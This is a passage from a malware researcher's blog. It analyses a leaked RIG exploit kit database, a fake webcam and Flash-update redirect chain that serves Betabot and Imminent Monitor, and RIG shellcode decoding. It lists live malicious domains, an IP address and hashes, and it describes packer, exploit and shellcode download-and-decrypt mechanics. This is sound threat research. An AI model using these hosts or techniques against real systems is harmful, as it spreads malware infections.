<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjv1dQ62pu4wWnLQUnHJN4wtWtdWd7nUVtGnFml2gaO0fb9pNclpKRqE9b2HOOsZecvdj_R8uaBF90X1KYAIapwe7zXqddcr9Z9_7-huRQ7xVryejmwDLvOim7GEOnkNU7ENkiXPOWYN38/s1600/domains_unpacked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="117" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjv1dQ62pu4wWnLQUnHJN4wtWtdWd7nUVtGnFml2gaO0fb9pNclpKRqE9b2HOOsZecvdj_R8uaBF90X1KYAIapwe7zXqddcr9Z9_7-huRQ7xVryejmwDLvOim7GEOnkNU7ENkiXPOWYN38/s320/domains_unpacked.png" width="320" /></a></div>
<br />
As the dumped sample is clean, meaning no reconstruction of the IAT is required, it's also possible to run it in a debugger to investigate in more depth how it behaves, without having to step through the packer's code and handle injections into other processes.<br />
<br />
I hope someone will find this post useful. Again, it's nothing new, just a tip on how malware can be unpacked and how to handle packers utilizing the RunPE technique.<br />
<br />
Thanks <a href="https://twitter.com/malware_traffic">@malware_traffic</a> for providing the sample used in the post; it can be found <a href="http://www.malware-traffic-analysis.net/2015/09/14/index2.html">here</a>.<br />
<br />
<h4>
A dive into the wake of the RIG EK leak</h4>
Published 2015-02-26<br />
Not long ago it became clear that parts of the RIG exploit kit had been leaked, including both source code (admin) and database. <a href="https://twitter.com/MalwareTechBlog">@MalwareTechBlog</a> wrote a post which summarizes the <a href="http://www.malwaretech.com/2015/02/rig-exploit-kit-possible-source-code.html">story behind the leak</a>.<br />
<br />
As the database included actual traffic and details of where that traffic was coming from, it was possible to do some digging into the origins of the redirects.<br />
<br />
I settled on one of the referers found in the database as it was still active: <i>oxprxt.tk</i>, which at the time of writing has been taken offline (the domain no longer resolves). However, I will cover what was available and what data was collected during the analysis.<br />
<br />
The flow associated with the referer was "51" and, well, it's not that impressive in terms of traffic volume; however, since more than zero exploits were launched, there is the possibility of an infection:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpjAClRVv5WozfY6INlqbDYKLZPSvXyOqyY7Pp10wYatv4DqSTRTou4iqfonbtp3Y2shJqvawdOLj3-8MCVSdVLaw93HPygaITyE4EkTAYBARukQyxpirLuPXoluURrD0eg6dWlLdR1Gg/s1600/rig_stats.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpjAClRVv5WozfY6INlqbDYKLZPSvXyOqyY7Pp10wYatv4DqSTRTou4iqfonbtp3Y2shJqvawdOLj3-8MCVSdVLaw93HPygaITyE4EkTAYBARukQyxpirLuPXoluURrD0eg6dWlLdR1Gg/s1600/rig_stats.png" height="320" width="307" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Flow 51</td></tr>
</tbody></table>
This particular flow is associated with a user called <i>"GenocideUID1971983"</i>, which can be broken down into <i>Genocide</i> and <i>UID1971983</i>, where the UID correlates to a user on a well-known hacking forum. This correlation also applies to all but one of the other users in the leaked database.<br />
<br />
I guess the seller wanted to keep track of which users he had sold to, and reading the story about the leak and the posts related to the service, there are signs that it was targeted for sale on one particular forum.<br />
<br />
<h4>
Dive! Dive! Dive!</h4>
Accessing oxprxt.tk directly gives a fake webcam chat page. What happens in the background is a totally different thing.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwZdLTr4Jd6SLKtgRqxJPlsz_eMZlpZEJybVfvzWWpRgAcQ6OocUkhPTawLaTwYBN1WWVAJUoadliAcPa-MwLjcqi50dfA1zepCWxfd26YEp-UMGAsQAe4lrqpLitl6vhwKxfoWvt6UDc/s1600/oxprxt.tk_landing.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwZdLTr4Jd6SLKtgRqxJPlsz_eMZlpZEJybVfvzWWpRgAcQ6OocUkhPTawLaTwYBN1WWVAJUoadliAcPa-MwLjcqi50dfA1zepCWxfd26YEp-UMGAsQAe4lrqpLitl6vhwKxfoWvt6UDc/s1600/oxprxt.tk_landing.png" height="172" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">First impressions while visiting oxprxt.tk</td></tr>
</tbody></table>
<br />
During the visit an error was generated related to PowerShell:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_MJ8sVocZVXv9YW5VXhP3q8y_r7UPkHXOBTvQnjzDP4u4kNgWeiKc5iaMHi2CszsVpUUwaAHAzTu9NJQ1UGXRzVObwsYB9tJo7endukjAdsSyEsRnlsEcDNU0umzhz-f6ZVJuUVKcf1o/s1600/powershell.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_MJ8sVocZVXv9YW5VXhP3q8y_r7UPkHXOBTvQnjzDP4u4kNgWeiKc5iaMHi2CszsVpUUwaAHAzTu9NJQ1UGXRzVObwsYB9tJo7endukjAdsSyEsRnlsEcDNU0umzhz-f6ZVJuUVKcf1o/s1600/powershell.png" height="58" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">PowerShell Error?</td></tr>
</tbody></table>
Three seconds later the page redirects to a fake Adobe Flash Player update page:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGIXhudwT2cBado3LcXj5-kjQZVROupEw1HDyUwUoOAfkfYfZ3Xf_VntBe0mVtCJPsdNlGBGI9eiX381muYKLT7mpLsF5Cx39wU2KK-BNo4l2o02rSuWlXCCSqX0hJQ_b1SpCCvkFYSWs/s1600/fake_flash.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGIXhudwT2cBado3LcXj5-kjQZVROupEw1HDyUwUoOAfkfYfZ3Xf_VntBe0mVtCJPsdNlGBGI9eiX381muYKLT7mpLsF5Cx39wU2KK-BNo4l2o02rSuWlXCCSqX0hJQ_b1SpCCvkFYSWs/s1600/fake_flash.png" height="230" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Fake Adobe Flash Player update page</td></tr>
</tbody></table>
Also, a request was generated in the background towards <i>jqueryapi.info</i>:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK2LUfF_Ch338Y5inhr6LW_z2BuDGrccwCPRHvEdO3zWXo2e5EpMwCsY_X9giw-90ly9l7nlzZfb6KZEucbyrh5BKwJJnXY6lR2Hq6JMc7AIcAReMkwVux2mIn4tnrKqMwR2XfoXzAbtg/s1600/jqueryapi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK2LUfF_Ch338Y5inhr6LW_z2BuDGrccwCPRHvEdO3zWXo2e5EpMwCsY_X9giw-90ly9l7nlzZfb6KZEucbyrh5BKwJJnXY6lR2Hq6JMc7AIcAReMkwVux2mIn4tnrKqMwR2XfoXzAbtg/s1600/jqueryapi.png" height="28" width="400" /></a></div>
<br />
<br />
<h4>
So... what happened?</h4>
The landing page consists of JavaScript which is packed and obfuscated. The first stage is a reversed, base64-encoded string which reveals another script packed using a variant of the Dean Edwards packer.<br />
<br />
The page is split into two parts, one being the HTML and redirection, the other an exploit for <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332">CVE-2014-6332</a>.<br />
<br />
The deobfuscated script shows two different methods for redirecting the victim to the fake Adobe Flash Player page, one being a timeout refresh and the other a click (for the impatient ones):<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqzDlZdiitZexF1bZOc3KgWl3dPZoA210Pgw725zHFUxtKluthFk7NQ9YyBIch-VsVDQ1dIyaCzPEs93h7xkBocrQEPmX4F0nTezX5xUrfh6V_v05sclFO177nYIgKRZeLJfyqnAW-LtM/s1600/redirection_html.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqzDlZdiitZexF1bZOc3KgWl3dPZoA210Pgw725zHFUxtKluthFk7NQ9YyBIch-VsVDQ1dIyaCzPEs93h7xkBocrQEPmX4F0nTezX5xUrfh6V_v05sclFO177nYIgKRZeLJfyqnAW-LtM/s1600/redirection_html.png" height="122" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">HTML and redirection methods</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxrknb3wB0S3bIBDBP4V2SZXETcuwGUhzORyLBkSJaLkmnim0d6fXAHMuS5HVw5s7FDQsLXW_GJrqjJ-K7VLE5mcK0zBBUsAtvv-ta_rFezLvSyVhve9GVJ2a4IeqXmXHHCNoL-A-Ox_w/s1600/vbscript_fail.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxrknb3wB0S3bIBDBP4V2SZXETcuwGUhzORyLBkSJaLkmnim0d6fXAHMuS5HVw5s7FDQsLXW_GJrqjJ-K7VLE5mcK0zBBUsAtvv-ta_rFezLvSyVhve9GVJ2a4IeqXmXHHCNoL-A-Ox_w/s1600/vbscript_fail.png" height="56" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">CVE-2014-6332 exploit</td></tr>
</tbody></table>
The above images are just snippets of the page; the full decoded page is available on [<a href="http://pastebin.com/fQfGRB65">pastebin</a>]. An almost exact copy of the exploit can be found on Exploit-DB [<a href="http://www.exploit-db.com/exploits/35308/">1</a>] [<a href="http://www.exploit-db.com/exploits/35229/">2</a>].<br />
<br />
So a visitor can be redirected to the fake update page either by waiting more than 3 seconds or by clicking the big "Click to CHAT" button.<br />
<br />
The error was generated because my VM didn't have PowerShell installed, which made it impossible to download and execute <i>Update.exe</i>. However, that particular file is the same threat that is served through the fake update page (more on that further on).<br />
<br />
The request made towards <i>jqueryapi.info</i> is quite interesting, as it returns different results depending on the referer; the most interesting part, however, is that one of the attempts generated the well-known cushion redirect:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsrCd323ULhI0KqAkhr6mzNeFX1doq8FO2Nshu8mYbCzZOIySuk2NTyhnC6Xu-G3I6ug7ICGchACNeWCu_UZcCFUIWhz2vb9FWEvJLbdMT6A8iEXwxO6aPgimHx6FQOPN_nSv3x2w4gfU/s1600/windigo_cushion_redirect.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsrCd323ULhI0KqAkhr6mzNeFX1doq8FO2Nshu8mYbCzZOIySuk2NTyhnC6Xu-G3I6ug7ICGchACNeWCu_UZcCFUIWhz2vb9FWEvJLbdMT6A8iEXwxO6aPgimHx6FQOPN_nSv3x2w4gfU/s1600/windigo_cushion_redirect.png" height="56" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Redirect cushion <23 chars>.domain.tld</td></tr>
</tbody></table>
As this acts as some kind of rotator, it's unclear how many different locations it could redirect to.<br />
<br />
On the Adobe Flash Player page, a file <i>install_flashplayer16x32_mssd_aaa_aih.exe</i> (<a href="https://www.virustotal.com/en-gb/file/e61f4a5b36aacca79053e71ebefa66bc22c5171e2210effe21946a9b3c397149/analysis/">d3014d0391fb9eccfccca288df6e11b8</a>) is offered for download. This is one of many files which turn out to be Betabot (details further on).<br />
<br />
<br />
<h4>
So, what have been found so far?</h4>
<b>oxprxt.tk</b> <b>[</b><a href="https://www.virustotal.com/en/url/a1f1d7eddcf57af1d941053ae3b1ca6b3c0f2e0a6068f3790bf20d87bb5a699b/analysis/1424787444/">VT</a><b>] </b>- Redirection to fake Adobe Flash page + exploiting CVE-2014-6332.<br />
<b>jqueryapi.info</b> <b>[</b><a href="https://www.virustotal.com/en/domain/jqueryapi.info/information/">VT</a><b>]</b> - Works as a rotator.<br />
<b>54.207.49.189</b> <b>[</b><a href="https://www.virustotal.com/en/ip-address/54.207.49.189/information/">VT</a><b>]</b> - Hosting the payload (Betabot) for the CVE-2014-6332 exploit.<br />
<br />
<br />
<h4>
Time to poke the bear!</h4>
Digging deeper into the server hosting the payload, it turns out there are more directories containing files with the same name (Update.exe), as well as a zip archive named <i>Virus.zip</i> containing an executable called <i>Virus.exe</i>.<br />
<br />
The directory structure on first visit:<br />
<br />
<i>/backend/ateb/Update.exe</i> (<a href="https://www.virustotal.com/en/file/e61f4a5b36aacca79053e71ebefa66bc22c5171e2210effe21946a9b3c397149/analysis/">d3014d0391fb9eccfccca288df6e11b8</a>) - Betabot - Uploaded: 10th Feb<br />
<i>/backend/ateb/Update.exe</i> (<a href="https://www.virustotal.com/en/file/1e2017f054bd4ef9cd805a7758bfe610fe8d94e80ae349f5965c7eaa52dd72bb/analysis/">8cbf7cbcdbb24374d60eb95c11a489fc</a>) - Betabot - Uploaded: 17th Feb<br />
<i>/backend/im3/Update.exe</i> (<a href="https://www.virustotal.com/en/file/38ee886e8311ae2e26dae11455493777df02b1686464b78098220d3b6c881155/analysis/">911cfaba8fb33309e9f331ae3ebc5ca4</a>) - Imminent Monitor - Uploaded: 3rd Feb<br />
<i>/backend/Update.exe </i>(<a href="https://www.virustotal.com/en/file/b1b4085ebe7ce2d9779719ebda7b34edda82a60738b39152d48cb73b48b026a6/analysis/">e833c258841623fadc2953e09a8f1d60</a>) - Betabot - Uploaded: 3rd Feb<br />
<i>/Virus.zip <b>-></b> Virus.exe</i> (<a href="https://www.virustotal.com/en/file/ec1960f250ee814174a5f5b04e329e0c4d257c7f397a13f75f2d6991e9fc9568/analysis/">ce4946e36f82592320ba3a5d0c0e38f2</a>) - Betabot - Uploaded: 8th Feb<br />
<i>/urmom/pl.php</i> - Unknown, keeps loading until timeout is reached. - Uploaded: 29th Oct 2014<br />
<i>/Panel/ </i>- Andromeda Panel<br />
<br />
On 20th Feb a directory called <i>Farhan</i> was created, which also included a zip archive called Virus.zip containing an executable, Virus.exe (<a href="https://www.virustotal.com/en/file/555b12ac29bfb62de383d2323be5f2ed373dfb39c87546a037866d52b82095b2/analysis/">93d4053a4a8000ac07eac6cb1d80021e</a>), which is also Betabot.<br />
<br />
The Andromeda panel was identified through Virustotal results together with the analysis done by <a href="http://blog.fortinet.com/post/a-good-look-at-the-andromeda-botnet">Fortinet</a>:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi28rHWJz8J8-dPCmAJjsoX7FdoFgu5EIHlWUTWo41MQhtKLRve9K7195zAF7SGBWud71qleI2SwCD0FpB5u7YevqMFy5tK0be6GKXcozz7KH9ad78Vhsmls2i2weR-zKX0CB80CbYmCM/s1600/andromeda_panel_vt.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi28rHWJz8J8-dPCmAJjsoX7FdoFgu5EIHlWUTWo41MQhtKLRve9K7195zAF7SGBWud71qleI2SwCD0FpB5u7YevqMFy5tK0be6GKXcozz7KH9ad78Vhsmls2i2weR-zKX0CB80CbYmCM/s1600/andromeda_panel_vt.png" height="51" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="https://www.virustotal.com/en/ip-address/54.207.49.189/information/">Virustotal results</a></td></tr>
</tbody></table>
As no sample related to the Andromeda panel was available, which commands and other files might have been downloaded on infection remains a mystery.<br />
<br />
<br />
<h4>
Prepare to get RickRolled!</h4>
All of the executables have one thing in common: they are obfuscated with the same crypter, written in .NET, which limits the number of victims that can be infected, as the .NET Framework must be installed.<br />
<br />
Although the name of the crypter is unknown, it carries a rather interesting message when looking at the strings:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKnFOLuaE1PFBedoFyElGtOa-rWjQwiCH6AVnttm6Sy1rn0c2VZ_ci0n0PHYMM4UUaRk380NhhLch0YbOLkS6URm8NSMBwjQZrAXypkWE-cDIe_GjVEbTTTJqmu1XLTlQu-lrka2oi-sU/s1600/rickroll.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKnFOLuaE1PFBedoFyElGtOa-rWjQwiCH6AVnttm6Sy1rn0c2VZ_ci0n0PHYMM4UUaRk380NhhLch0YbOLkS6URm8NSMBwjQZrAXypkWE-cDIe_GjVEbTTTJqmu1XLTlQu-lrka2oi-sU/s1600/rickroll.png" height="52" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Link to YouTube playing 10 hour Rick Roll</td></tr>
</tbody></table>
Funny... anyway, unpacking was as trivial as putting a breakpoint on WriteProcessMemory and dumping the unpacked code from memory. Yet another layer of obfuscation was used before ending up with a plain Betabot:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMDxsWShuenp7B7gISLGSNuPPnc2pwp6BRXf_0Q-LUCMudzzOnm0lo809486lTk78z4xhytstgtR-TgGLbmR0E0gT55FBzr-91uQYE7GjgshI8FPl0OpAVnSIHVT_x3kbISfbfvV47CZY/s1600/betabot_strings.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMDxsWShuenp7B7gISLGSNuPPnc2pwp6BRXf_0Q-LUCMudzzOnm0lo809486lTk78z4xhytstgtR-TgGLbmR0E0gT55FBzr-91uQYE7GjgshI8FPl0OpAVnSIHVT_x3kbISfbfvV47CZY/s1600/betabot_strings.png" height="149" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Betabot strings</td></tr>
</tbody></table>
The only file that didn't turn out to be Betabot was the file located in /im3/ which turned out to be Imminent Monitor (IM):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtkq0Zqxoe1wlv4_rB7W9iwCum006zK9pRVmzSIbk1EP_IRobX8C1tiYGu0jKcDsaazDU_XXatNpuXzUabeH1h3YHSQyRjpLIjUK2_Dl7X5HbbMMKX_hlWg9329ezcr5KBwhqiFTqz1jY/s1600/imminent_strings.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtkq0Zqxoe1wlv4_rB7W9iwCum006zK9pRVmzSIbk1EP_IRobX8C1tiYGu0jKcDsaazDU_XXatNpuXzUabeH1h3YHSQyRjpLIjUK2_Dl7X5HbbMMKX_hlWg9329ezcr5KBwhqiFTqz1jY/s1600/imminent_strings.png" height="120" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdeBW557Ak6i9CRh1QMPnnrNueKd3xMNy68bVPq-T8RcE5M_OMpvdRPXSfAkY1hLecXAmVBYj-07z9Hcl-seas7SZ3NQC2uhRE3ReVjACJ6lrXTkJawFVaOB4Bee1lAUK8BLz7E6qIoUQ/s1600/imminent_strings2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdeBW557Ak6i9CRh1QMPnnrNueKd3xMNy68bVPq-T8RcE5M_OMpvdRPXSfAkY1hLecXAmVBYj-07z9Hcl-seas7SZ3NQC2uhRE3ReVjACJ6lrXTkJawFVaOB4Bee1lAUK8BLz7E6qIoUQ/s1600/imminent_strings2.png" height="76" width="400" /></a></div>
IM is a RAT developed by Shockwave. It's sold publicly on its own website as well as on forums and seems to be quite popular. Like the crypter mentioned earlier, IM is written in .NET, so it depends on the .NET Framework and will not run on every system.<br />
<br />
An interesting note is that the IM sample was uploaded on 3rd Feb, and on 8th Feb Genocide (the username associated with the RIG flow) posted a thread selling his IM license:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtMo7K8bX48Kq7xR1RqylXHUIAQFRzpkTDuZdBMu8QndQpYDRyDghLUfD0NlwcQKoPwaX-rNPJkZ3JXEzS5OI3wHb9xrg4Zibd7YXZ2e9BjDoi2giI9rMf47uWWVCpVp_0zZB-5l4ZupM/s1600/im3_license_selling.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtMo7K8bX48Kq7xR1RqylXHUIAQFRzpkTDuZdBMu8QndQpYDRyDghLUfD0NlwcQKoPwaX-rNPJkZ3JXEzS5OI3wHb9xrg4Zibd7YXZ2e9BjDoi2giI9rMf47uWWVCpVp_0zZB-5l4ZupM/s1600/im3_license_selling.png" height="155" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Selling IM3 license</td></tr>
</tbody></table>
This was shortly after the /im3/ directory was removed. It is unclear whether this directory is tied to Genocide on the forums; the flow itself, however, is linked to this forum user.<br />
<br />
<br />
<h4>
Connecting all the dots and do some visualizing</h4>
For this particular case I decided to use <a href="http://www.yworks.com/en/products/yfiles/yed/">yEd</a> to connect all the entities and create an overview of what was found during the investigation, including the destinations the samples communicated with.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQmHhIfODZ3HDRZ8FaJ6OucH7cPLfX77byxeIuA6TizZgcyer7BvSzXFu7hAqbGPeuh4w2a726Geh3DPR1LyD2hEKluCEhuso_O4iRU4n4Qrf6WUBWmYkxE_R5eF2pXnCQnnPtVObs9PY/s1600/graph_graphml_-_yEd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQmHhIfODZ3HDRZ8FaJ6OucH7cPLfX77byxeIuA6TizZgcyer7BvSzXFu7hAqbGPeuh4w2a726Geh3DPR1LyD2hEKluCEhuso_O4iRU4n4Qrf6WUBWmYkxE_R5eF2pXnCQnnPtVObs9PY/s1600/graph_graphml_-_yEd.png" height="282" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
All files mentioned are available on demand.<br />
<h3>
RIG Exploit Kit - Shellcode analysis</h3>
<i>Posted 2014-12-01</i><br />
<a href="https://twitter.com/malware_traffic">Brad</a> published a <a href="http://malware-traffic-analysis.net/2014/11/16/index.html">traffic analysis exercise</a> which I had a quick look at. I wanted to take it a step further, so I started looking at how to decode the payload delivered by the exploit kit.<br />
<br />
The shellcode is taken from the Flash exploit, where it's provided as a hex-encoded string starting with "90909090" (a NOP sled):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpuOj4cni0xNuluLNAK-1PLYNpBD-mGRt9YFQ84VsAYKMMZMyjQQuCI3WFKut0ivjaZpvLZb3clSIy-Vfq5YxKxvWyVnPWmIwYSQs5qwb3nGDFYxBN7pfNReX82RPWS4_6Avp9QJFs_qQ/s1600/rig_shellcode_flash_nop.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpuOj4cni0xNuluLNAK-1PLYNpBD-mGRt9YFQ84VsAYKMMZMyjQQuCI3WFKut0ivjaZpvLZb3clSIy-Vfq5YxKxvWyVnPWmIwYSQs5qwb3nGDFYxBN7pfNReX82RPWS4_6Avp9QJFs_qQ/s1600/rig_shellcode_flash_nop.png" height="56" width="400" /></a></div>
An easy way in is to turn the shellcode into an executable with <a href="http://sandsprite.com/shellcode_2_exe.php">Shellcode2Exe</a> so it can be stepped through in OllyDbg.<br />
<br />
<i><b><span style="font-size: large;">Taking the step into shellcode</span></b></i><br />
Loading it up in Olly, it starts with a loop that decodes the payload URL using XOR, as seen below. The key can be found by inspecting ESI when the loop is first hit, and the encoded data by inspecting EDI.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZPhqb6shTiXBP4vtUTW4AH_6IcIplA1PZGXOhFFIzYNEw0Z9AHrDMTYiCvk3d_cYPyG-BbWA7H2VUXn3xYP6BkMCYrMsl0drhQlwAWAsuTaXXhkSQGsMxaq1JrCM4FfGntzZkcyVJVAE/s1600/rig_shellcode_xor.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZPhqb6shTiXBP4vtUTW4AH_6IcIplA1PZGXOhFFIzYNEw0Z9AHrDMTYiCvk3d_cYPyG-BbWA7H2VUXn3xYP6BkMCYrMsl0drhQlwAWAsuTaXXhkSQGsMxaq1JrCM4FfGntzZkcyVJVAE/s1600/rig_shellcode_xor.png" height="320" width="281" /></a></div>
After decoding:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibcdTpzjotHRxDxVm4QNRKagwcawuAWuKNuKdMsW0XbkP5xGpEfz30Mu5loraZqnWUPr8zDIpxnePR88EZ9Ra7JDJcmz4y0bydqzmAHheQSUyfkZdu_g2JNM3T0sACLdz72oEK0Sik-YA/s1600/rig_shellcode_xor_decoded.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibcdTpzjotHRxDxVm4QNRKagwcawuAWuKNuKdMsW0XbkP5xGpEfz30Mu5loraZqnWUPr8zDIpxnePR88EZ9Ra7JDJcmz4y0bydqzmAHheQSUyfkZdu_g2JNM3T0sACLdz72oEK0Sik-YA/s1600/rig_shellcode_xor_decoded.png" height="114" width="320" /></a></div>
The decoding loop continues until the decoded byte is "!" (0x21); the reason is explained later in the post under "Multiple payloads".<br />
<br />
The shellcode uses <a href="http://msdn.microsoft.com/en-us/library/ie/ms775122%28v=vs.85%29.aspx">URLDownloadToCacheFileA</a> to download the payload. Should the payload be successfully downloaded, it will be opened with <i>CreateFileA</i> and read with <i>ReadFile</i> into memory allocated using <i>VirtualAlloc</i>.<br />
<br />
After reading the file it is decrypted with the RC4 cipher using a key defined in the shellcode. I recommend <a href="http://vrt-blog.snort.org/2014/06/an-introduction-to-recognizing-and.html">reading the post</a> from VRT on how to recognize RC4 while debugging (the 256-byte state array and the byte-swap loop are the giveaway). This is the function found in the shellcode:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizqWyhBZoIUziPUIAekqHwoWfs0OQiqi8q1yci6Cu4b5rZG-A-HnLk-GfgLUA22nZZdFGylKrALpl1Kyf07TPmJKK9BRCxoEdqeZBmEpAqf7BfCOCDMttjB7QaOJ807YxRKN9_V0EMXg4/s1600/rig_shellcode_rc4_function.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizqWyhBZoIUziPUIAekqHwoWfs0OQiqi8q1yci6Cu4b5rZG-A-HnLk-GfgLUA22nZZdFGylKrALpl1Kyf07TPmJKK9BRCxoEdqeZBmEpAqf7BfCOCDMttjB7QaOJ807YxRKN9_V0EMXg4/s1600/rig_shellcode_rc4_function.png" height="284" width="320" /></a></div>
Inspecting EDI when hitting the above lines it's found to have the following content:<br />
<div class="separator" style="clear: both; text-align: center;">
